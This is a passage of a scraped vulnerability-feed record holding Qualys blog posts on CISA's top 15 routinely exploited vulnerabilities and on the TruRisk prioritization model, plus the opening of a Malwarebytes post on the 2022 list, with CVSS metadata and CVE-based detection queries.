Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-11T22:50:52", "description": "Vulnerability Management is a foundational component of any cybersecurity program for the implementation of appropriate security controls and the management of cyber risk. Earlier this year Qualys introduced the latest iteration of its vulnerability management product [VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) which focusses on helping organizations understand and manage cyber risk. Qualys TruRisk assesses risk by taking into account multiple factors such as evidence of vulnerability exploitation, asset criticality, its location, and evidence of compensating controls on the asset among many other factors to assess the accurate risk posture for an organization.\n\nIn this blog we do a deep-dive into the vulnerability prioritization algorithm for TruRisk, compare it to existing vulnerability scoring systems, such as Common Vulnerability Scoring System (CVSS) and Exploit Prediction Scoring System (EPSS), to demonstrate why TruRisk is a better method for prioritizing risk than existing methods. This blog is the first of many blogs focused on different aspects of TruRisk, with other aspects covered in later blogs.\n\n### **Key Takeaways**\n\n * Since 2016, every subsequent year has reported more vulnerabilities than the year before (on average 8%-10% more)\n * CVSS based prioritization results in 51% of vulnerabilities marked as high or critical which leads to ineffective, low-value prioritization\n * Less than 3% of vulnerabilities have weaponized exploits or evidence of exploitation in the wild, two attributes posing the highest risk.\n * Exploit Prediction Scoring System (EPSS) is a step in the right direction to predict vulnerability exploitation. However, it still ranks some vulnerabilities that are actively exploited with a lower probability of exploitation\n * Qualys TruRisk helps organizations prioritize risk by focusing on exploitability, evidence of exploitability, and likelihood of exploitability resulting in up to 85% fewer vulnerabilities to prioritize compared to CVSS.\n\nQualys TruRisk brings asset context, threat context and vulnerability intelligence data under one platform empowering IT and security teams to make better, informed prioritization decisions.\n\nBut first let\u2019s talk about few key challenges.\n\n### Vulnerabilities Are on the Rise\n\nEvery year since 2016, (see Fig. 1) the number of the vulnerabilities reported by NIST has been greater than the year before. According to the [National Vulnerability Database](<https://nvd.nist.gov/vuln/search/statistics?form_type=Basic&results_type=statistics&search_type=all&isCpeNameSearch=false>) (NVD) the number of vulnerabilities reported in 2022 (18,841) has already surpassed the vulnerabilities reported in 2020. And we still have three months to go.\n\nFigure 1: Number of Vulnerabilities by Year (Source: NVD)\n\n### **Vulnerability Threat Landscape**\n\nAs the number of vulnerabilities increase, so does the risk to enterprises. But not all vulnerabilities are created equally. Some vulnerabilities pose greater risk to organizations than others. For example, less than 3% of the vulnerabilities have exploit code weaponized. It is crucial to prioritize vulns like these, that are some of the most critical vulnerabilities first. \n\nFigure 2: Vulnerability Threat Landscape\n\nTraditionally, organizations have relied on CVSS scores for prioritization. However, as we will see in the next section, there are limitations in using CVSS as the only vulnerability prioritization method.\n\n### Challenges With CVSS Based Prioritization \n\nThe **Common Vulnerability Scoring System (CVSS) was introduced in the early 2000s to address the need for **a common method to rate the severity of vulnerabilities. Previously, two researchers could rate the same exact vulnerability in different ways based on their subjective understanding of the vulnerability. This created confusion for security practitioners because they could not accurately determine the actual severity of vulnerabilities. The CVSS system was developed to address this issue by enabling the uniform _technical_ severity assessment of vulnerabilities.\n\nA key factor to keep in mind is CVSS only calculates the technical severity of the vulnerability, not the risk it poses to an organization. Over time, CVSS has been used as a proxy for determining the risk a vulnerability posed to the organization, leading to unintended consequences. This includes patching cycles spent fixing countless vulnerabilities with a CVSS score of 7.5 or higher, while some medium severity vulnerabilities were deprioritized even if they posed a greater risk.\n\nCVSS scores are categorized into four categories low, medium, high, critical. \n\nCVSS Score| CVSS Severity \n---|--- \n0.1 \u2013 3.9| Low \n4.0 \u2013 6.9| Medium \n7.0 \u2013 8.9| High \n9.0 \u2013 10.0| Critical \n \nFigure 3: CVSS Score distribution grouped by CVSS severity\n\nAs shown in Fig.3, **51% (96,340) of the total vulnerabilities are categorized as Critical or High according to CVSS scores**. However, empirical research shows that not all the vulnerabilities in these CVSS score buckets need equal/high attention. The main issue is that CVSS base scores don\u2019t consider threat information like active exploitation in the wild, likelihood of the exploitation in the wild, activity associated with it in dark web or social media, known exploit categorized by CISA, threat actors associated, etc.\n\nAs shown in Fig. 4, as expected known exploited vulnerabilities (as categorized by [CISA Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) are concentrated at higher CVSS scores (the red dots indicate CISA KEV vulnerabilities).\n\nHowever, there are a significant number of exploits discovered even for lower CVSS scores. For example, **there are 92 out of 832 (11%) CISA_KEV vulnerabilities that have a CVSS score of less than 7.** This could be an issue when relying only on CVSS scores.\n\nFigure 4: CISA known vulnerabilities distributed across CVSS score.\n\n### **Exploit Prediction Scoring System**\n\nTo address challenges related to lack of threat context in the CVSS scoring system, first.org in recent years introduced [Exploit Prediction Scoring System (EPSS)](<https://www.first.org/epss/>), an open, data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild. This is a step in the right direction. EPSS\u2019s goal is to help network defenders better prioritize vulnerability remediation efforts. The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.\n\nAs evidenced by Figure 5. EPSS helps highlight vulnerabilities with high likelihood of exploitation and correlates well with CISA KEV vulnerabilities.\n\nFigure 5: EPSS Score and CISA Known Vulnerabilities distribution across CVSS score\n\nFigure 6: EPSS Score distribution\n\nThe availability of patches also plays a key role in EPSS scores. If patches are available, the probability of exploitation is ranked lower. Many of the CISA Known Vulnerabilities are scored lower in EPSS if they have patches/fixes available. However when prioritizing what to patch first, we need to consider the whole set, not just the ones with patches. For example, consider the following recent vulnerabilities which have low EPSS scores. If we rely only on EPSS to prioritize them, they will not show up in a priority list of vulnerabilities to be remediated. Several examples of vulnerabilities with low EPSS scores and high TruRisk scores are shown in Figure 5.\n\nCVE| Title| EPSS| TruRisk (QVS) \n---|---|---|--- \nCVE-2021-36942| PetitPotam| 0.26| 95 \nCVE-2021-31207| Proxyshell| 0.02| 95 \nCVE-2021-34523| Proxyshell| 0.16| 100 \nCVE-2022-30190| Follina| 0.69| 100 \nCVE-2016-3351| Microsoft Edge Cumulative Security Update (MS16-105)| 0.24| 95 \n**Critical CVEs with patches available scoring low on EPSS**\n\n### **Qualys Severity Levels**\n\nGiven the challenges with CVSS scores, the Qualys research team introduced [Qualys severity levels](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/knowledgebase/severity_levels.htm>) to assess the severity of Qualys IDs (QIDs). In addition to determining the risk associated with exploitation, Qualys severity levels also focus on potential consequences of vulnerability exploitation from an attacker\u2019s point of view. Each QID severity level is reviewed by the Qualys Research Team, including taking vulnerability chaining, server-side vs client-side vulnerabilities, and information from various threat-intel sources to accurately assess them into consideration.\n\nQualys severity levels are an improvement over CVSS as they helped customers quickly prioritize critical vulnerabilities as can be seen in Fig. 7. \n\nFigure 7: Qualys Severity Level Distribution (Source: Qualys)\n\n### Qualys TruRisk, a Data-Driven Way To Prioritize Risks\n\nAll of the scoring mechanisms presented so far are attempting to answer one key question\n\n_What should defenders focus on first?_\n\nEach model attempts to answer the question in its own way but falls short of its goal. Organizations need a better way to respond quickly and prioritize vulnerabilities based on risk.\n\nTo address these challenges Qualys introduced [Qualys VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) earlier this year to help organizations prioritize vulnerabilities, assets, and groups of assets based on risk. \n\nQualys VMDR with TruRisk is powered by one of the most comprehensive exploit and threat intelligence databases. It spans over 185k CVEs, and 25+ unique threat and exploit intelligence sources such as Metasploit, Canvas, CISA KEV, and even Github, which is increasingly becoming the go-to place to publish exploits.\n\nWith TruRisk, organizations can pinpoint which CVEs are exploited in the wild (even those that don't have a QID) and which malware, ransomware, or threat actor groups are exploiting them. These insights can then be used to prioritize vulnerabilities based on risk.\n\nLet\u2019s take a closer look into how the TruRisk algorithm works, and how it compares to CVSS and EPSS.\n\nTo determine risk, Qualys TruRisk vulnerability scores rely on multiple factors to build the most accurate risk profile for a vulnerability.\n\n**Qualys Vulnerability Score (QVS)** is a Qualys-assigned score for a vulnerability based on multiple factors associated with the CVE such as CVSS and external threat indicators like active exploitation, likelihood of vulnerability being exploited in wild, sighting in the darkweb and social web, exploit code maturity, CISA known exploitable and many more. \n \n**Qualys Detection Score (QDS)** is assigned to QIDs by Qualys. QDS has a range from 1 to 100. If multiple CVEs contribute to a QID, the CVE with the highest score is considered for the QDS calculation. \n \n**Asset Risk Score (ARS)** is the overall risk score assigned to the asset based on the following contributing factors such as Asset Criticality Score (ACS), QDS scores for each QID level, Auto-assigned weighting factor (w) for each criticality level of QIDs, number of vulnerabilities on an asset.\n\nHere is the list of inputs that go into the algorithm.\n\n### **CVSS Base Score**\n\nThe CVSS base score serves as one of the key inputs to assess the risk of the vulnerability. CVEs with higher CVSS base scores are rated higher than those with lower scores. But a high CVSS score alone doesn\u2019t result in a high TruRisk risk score. Evidence of exploitation or weaponized exploit code maturity is required for the CVE to fall in the critical range.\n\n### **CISA Known Exploited Vulnerability (KEV)**\n\nVulnerabilities that are catalogued by CISA as known exploited vulnerabilities that are actively being exploited in the wild are included in the algorithm\n\n### **Real-Time Threat Indicators (RTIs)**\n\nThe TruRisk algorithm considers the type of vulnerability. For example, is it a Denial-of-Service (DoS) vulnerability or a remotely exploitable vulnerability? In the case of remote vulnerability or a web application vulnerability, the risk is rated higher. Other RTI\u2019s such as zero-day, active attacks, high data loss, high lateral movement, etc. that are collected from various threat feeds are also considered by the algorithm.\n\n### **Exploit Code Maturity **\n\nThe TruRisk algorithm analyzes the exploit code maturity for the given vulnerability. The exploit code maturity could be a Proof-of-Concept (PoC) which suggests a theoretical exploit exists. The exploit may already work against systems, or it could be weaponized, in which case the exploit code is considered very mature and can be easily used to compromise a system. The QDS algorithm rates weaponized exploits higher than PoC exploits. \n\n### **Malware **\n\nThe TruRisk algorithm checks to see if the vulnerability is being actively exploited by malware. If it is, then the risk is rated higher.\n\n### **Threat Actors / Ransomware Groups**\n\nThe TruRisk algorithm validates if any threat actors or ransomware groups are actively exploiting the vulnerability. If that is the case, the risk is rated even higher than if it only being exploited by malware. \n\n### **Trending Risk**\n\nThe TruRisk algorithm checks if the vulnerability has been actively exploited in the last 14 days by monitoring the Dark Web, social media, GitHub accounts, and many other similar sources. The risk is further increased if the vulnerability is determined to be trending and exploited in the wild. \n\n### **Applied Mitigation Controls**\n\nThe algorithm correlates the risk from the vulnerability with intelligence related to the asset to assess whether the vulnerability represents a threat to it. For example, the vulnerability may exist on the asset, but the system may have mitigation controls already applied which greatly reduce the risk of exploitation of the vulnerability in the customer\u2019s specific environment. \n\n### **EPSS Score (from First.org)**\n\nQualys TruRisk also leverages [EPSS](<https://www.first.org/epss/model>) scores which predict the probability of a vulnerability being exploited in the next 30 days. Vulnerabilities with a higher EPSS score are ranked higher.\n\nFigure 8: Contributing factors to Qualys TruRisk Scores\n\n### How Does Qualys TruRisk Compare Against CVSS and EPSS?\n\nAs customers adopt Qualys TruRisk to address their prioritization needs they want to know how CVSS and EPSS and TruRisk compare.\n\nQualys TruRisk is hyper focused on three attributes: exploit availability, evidence of exploitation in the wild, and likelihood of exploitation. This helps organizations focus on the highest risk vulnerabilities.\n\nQualys TruRisk rates less than 1% of vulnerabilities as critical, and less than 7% of vulnerabilities as high. This drastically reduces the number of vulnerabilities (up to 85% fewer compared to CVSS which ranks 51% of vulnerabilities high or critical) that organizations need to focus on to reduce risk. See Fig. 9.\n\nClearly organizations need to remediate other vulnerabilities as well. However, when deciding where to begin, we recommend starting with vulnerabilities that have a TruRisk-QDS risk score of 70 or higher. \n\n### **Qualys Vulnerability Score (QVS) vs CVSS**\n\nFigure 9: Distribution of TruRisk (QVS) Scores vs CVSS\n\n### **Qualys TruRisk vs EPSS**\n\nThe following figure (Fig. 10) shows the distribution of EPSS scores with Qualys Vulnerability Scores (QVS) and CISA known vulnerabilities. QVS scores consistently place vulnerabilities with evidence of exploitation, such as CISA known vulnerabilities, in a higher score range even if the EPSS score is low as annotated in the figure below.\n\nFigure 10: EPSS Score vs TruRisk (QVS) Score\n\n### **Qualys TruRisk (QVS) vs CISA KEV**\n\nEvidence of vulnerability exploitation from sources such as a CISA KEV and other threat intelligence sources tracked by the Qualys research team play a key role in determining the risk of a vulnerability.\n\nAs seen below, vulnerabilities that appear in CISA Known Exploited Vulnerabilities are consistently scored higher (QVS scores of 90 or higher) by the Qualys TruRisk algorithm. (fig. 11).\n\nFigure 11: CISA Known Vulnerabilities distributed across QVS score.\n\nLet's take the example of CVE-2021-36942 (the Windows LSA Spoofing Vulnerability). It is rated at 5.3 by the National Vulnerability Database (NVD), but it\u2019s actively exploited today by malware groups and threat actors. The exploit code maturity is weaponized, making it easy for attackers to exploit the vulnerability to compromise and infect systems). Qualys TruRisk ranks CVE-2021-36942 vulnerability as critical given its exploit availability and evidence of exploitation in the wild.\n\n\n\n### **How to Interpret Qualys TruRisk Scores**\n\nQualys TruRisk builds the vulnerability risk profile of vulnerabilities, assets, and asset groups by using the following three risk scores:\n\n**Qualys Vulnerability Score (QVS)** \u2013 QVS is assessed at each CVE level based on the external threat and exploit intelligence factors listed above. It is also computed for vulnerabilities that don\u2019t have Qualys vulnerability detection signatures (QIDs). These QVS scores can be individually queried for insights from our [dedicated API endpoint](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>).\n\n**Qualys Detection Score (QDS)** \u2013 QDS is assessed at each QID level. This is the score customers need to focus on for their vulnerability prioritization needs. **QDS builds on the QVS score by adding two key aspects**. Some QIDs can be mapped to multiple CVEs. QDS selects the highest QVS of all associated CVEs to that QID. Next, QDS accounts for any compensating/mitigation controls that are applied to an asset to reduce the risk score for a given vulnerability. For example, QDS will reduce the risk of a Remote Desktop Protocol (RDP) vulnerability if RDP is disabled.\n\nQDS/QVS Range| Description \n---|--- \n>=95| CVSS critical, exploited in the wild, has weaponized exploit available, trending risk on social media, dark web. \n90-95| CVSS critical, weaponized exploit available, and evidence of exploitation by malware, threat actors/ransomware groups \n80-89| CVSS Critical, weaponized exploit available, but no evidence of exploitation. \nCVSS Critical with evidence of exploitation, but mitigation in place. \n70-79| CVSS High, weaponized exploit available, but no evidence of exploitation \n60-69| CVSS critical, no exploits available \n50-60| CVSS High, a Proof of Concept (PoC) exploit is available \n40-50| CVSS High, no exploit available \n30-39| CVSS Medium, a PoC exploit is available \n1-30| CVSS Low vulnerabilities, low risk of exploitation \n \n### **Asset Risk Score (ARS) **\n\nQualys TruRisk\u2019s next type of risk score allows organizations to identify the riskiest assets in their organization. To assess the risk an asset poses to an organization, the** Asset Risk Score** considers multiple factors.\n\nThe primary factor considered by ARS is Asset Criticality, ie, what risk the asset poses based on its business value. For example: Is the asset part of a production system, a system hosting a production database, or is it purely an internal system used for development and test purposes. Production assets should be rated higher than test systems.\n\nQualys TruRisk determines the business criticality of the asset using multiple approaches, including: \n\n * **Manual** **Ratings **\u2013 TruRisk allows users to set the criticality of the system by using asset tags \n * **Synchronization with CMDB** \u2013 Most enterprises store business criticality information for assets in a configuration management database. Qualys automatically maps to CMDB data to determine the criticality of the system \n * **API\u2019s \u2013 **Using [Qualys APIs for Asset Management and Tagging](<https://www.qualys.com/docs/qualys-asset-management-tagging-api-v2-user-guide.pdf>), users can assign business criticality to an asset \n\nFinally, TruRisk analyzes the vulnerabilities found on the system and determines the asset\u2019s risk based on the QDS scores of the vulnerabilities on an asset by a clearly defined formula called the Asset Risk Score formula.\n\n### **Asset Risk Score Formula**\n\nThe Asset Risk Score (ARS) is calculated using the following formula: \n \n \n ARS Score = ACS Score * [wc * Avg (QDS for Critical Vuln) * f (Critical vuln count) + \n \n wh * Avg (QDS for High Vuln) * f (High vuln count) + \n \n wh * Avg (QDS for Medium Vuln) * f (Medium vuln count) + \n \n wh * Avg (QDS for Low Vuln) * f (Low vuln count)] * I(External) \n\nIn the above formula, **_ACS _**is Asset Criticality Score, **_w__**are the weights fine-tuned by TruRisk algorithm to multiply each of the severity, function **_f_**_ ()_, is a non-linear function that increases exponentially as number of vulnerabilities increases. Also, the factor **_I(External)_** is for the case where an asset is external facing or discoverable by Shodan. This factor increases the score appropriately for external facing assets.\n\nARS Range| Severity| Description \n---|---|--- \n850-1000| Critical| Critical asset with multiple critical or high vulnerabilities \n700-849| High| High value asset with multiple number of critical or high vulnerabilities or is exposed to the internet \n500-699| Medium| Moderate value asset with critical or high vulnerabilities \n0-499| Low| Low value asset with multiple vulnerabilities \n \n### Conclusion\n\nQualys TruRisk offers organizations a comprehensive approach to risk prioritization by considering multiple factors such as vulnerability exploitation, presence of compensating controls, asset criticality, its location (internal or external) to name a few to paint an accurate picture of organization\u2019s TruRisk (pun intended). In this blog we did a deep-dive into one aspect of TruRisk (vulnerability prioritization) and showcased how it\u2019s better than existing models. This blog is the first of series of blogs around TruRisk, and in subsequent blogs we will do a similar deep-dives into other aspects of TruRisk for e.g. asset risk, asset group risk, misconfigurations and many more to help organizations prioritize better based on risk.\n\nWith Qualys TruRisk we have introduced foundational building blocks for major cyber risk initiatives like peer benchmarking, risk score customization, third-party risk assessment, and many more. We are very excited about TruRisk and the benefits it provides to our customers. Stay tuned for more updates.\n\n### Additional Contributors\n\n 1. Shreya Salvi, Data Scientist, Qualys\n 2. Mehul Revankar, VP, Product Management & Engineering for VMDR, Qualys\n 3. Payal Mehrotra, Senior Director, Product Management for CyberRisk, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-10T14:32:29", "type": "qualysblog", "title": "In-Depth Look Into Data-Driven Science Behind Qualys TruRisk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3351", "CVE-2021-31207", "CVE-2021-34523", "CVE-2021-36942", "CVE-2022-30190"], "modified": "2022-10-10T14:32:29", "id": "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2023-08-12T00:28:46", "description": "The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners have released a joint Cybersecurity Advisory (CSA) called the [2022 Top Routinely Exploited Vulnerabilities](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>).\n\nWe went over the list and it felt like a bad trip down memory lane. If you adhere to the expression \"those who ignore history are doomed to repeat it\" then you may consider the list as a valuable resource that you can derive lessons from. Unfortunately as George Bernard Shaw said:\n\n> "We learn from history that we learn nothing from history."\n\nBut since that's a self-contradicting expression, let's assume there are lessons to be learned.\n\n## Last year's top vulnerabilities\n\nFirst let me show you the bad memories. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. We will use the CVE codes to uniquely identify the covered vulnerabilities.\n\n * [CVE-2021-40539](<https://vulners.com/cve/CVE-2021-40539>) is a REST API authentication bypass vulnerability in [ManageEngine's single sign-on (SSO) solution](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) which results in remote code execution (RCE). When word of this vulnerability came out it was already clear that it was being exploited in the wild. Noteworthy is that this vulnerability also made it into the [top 5 routinely exploited vulnerabilities of 2021](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>).\n * [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), aka [Log4Shell](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>), is a vulnerability in Apache's Log4j library, an open-source logging framework incorporated into thousands of other products. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest throughout the first half of 2022.\n * [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>) is a vulnerability affecting Fortinet SSL VPNs, which was also routinely exploited in 2020 and 2021.\n * [ProxyShell](<https://www.malwarebytes.com/blog/news/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities>) is a combination of three vulnerabilities in Microsoft Exchange Server ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>), [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>), and [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)) that can be chained together to allow a remote attacker to break in, take control, and then do bad things on an unpatched server. Proxyshell also made it into the top 5 routinely exploited vulnerabilities of 2021.\n * [CVE-2021-26084](<https://vulners.com/cve/CVE-2021-26084>) is a vulnerability affecting Atlassian Confluence Server and Data Center which could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a proof-of-concept (PoC) was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021 and also made it into the top 5 routinely exploited vulnerabilities of 2021.\n\nLooking at the above, it looks like Shaw was at least partly right. We are not learning from history. It also indicates that we should be able to predict some of the vulnerabilities that will show up in next year's list. Let's take a stab at that. So we're looking for easy to overlook and/or hard to patch vulnerabilities in the 2022 list that we haven't already covered above.\n\n## This year's top vulnerabilities?\n\nThese are the ones that I think will make it to the top 10 next year, maybe together with the ones that have already been around for years.\n\n * [CVE-2022-22954](<https://vulners.com/cve/CVE-2022-22954>), [CVE-2022-22960](<https://vulners.com/cve/CVE-2022-22960>) are two vulnerabilities that can be chained to allow Remote 